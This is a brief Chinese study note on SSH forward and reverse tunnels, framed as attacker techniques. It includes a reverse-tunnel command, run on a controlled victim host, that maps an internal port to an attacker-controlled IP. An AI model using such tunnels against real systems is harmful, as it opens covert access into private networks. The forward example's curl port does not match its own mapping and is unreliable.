【笔记】SSH隧道

前言

SSH隧道

正向

  • 攻击者主动将能访问到的受害者的数据映射到攻击者能访问的主机上,可以是本机,也可以是其他攻击者能访问的主机

  • 在攻击者主机上执行命令

<ip_remote>:受害者IP地址,从攻击者方向访问受害者
<port_remote>:受害者端口号
<ip_local>:攻击者的本机IP地址,也可以是其他攻击者能访问的主机的IP地址
<port_local>:攻击者的本机端口号,也可以是其他攻击者能访问的主机的端口号

1
ssh -CfNg -L <port_local>:<ip_remote>:<port_remote> root@<ip_local>
  • 在攻击者主机上查看映射后的数据
1
curl http://127.0.0.1:<port_remote>

反向

  • 攻击者控制受害者,将受害者网络内的某个IP地址和端口号映射到攻击者的IP地址和端口号

  • 在受害者主机上执行命令

<ip_local>:受害者的本机IP地址,也可以是受害者网络内的需要出网的IP地址
<port_local>:受害者的本机端口号,也可以是受害者网络内的需要出网的端口
<ip_remote>:攻击者用来接收数据的IP地址,从受害者方向访问攻击者
<port_remote>:攻击者用来接收数据的端口号

1
ssh -CfNg -R <port_remote>:<ip_local>:<port_local> root@<ip_remote>
  • 在攻击者主机上查看映射后的数据
1
curl http://127.0.0.1:<port_remote>

完成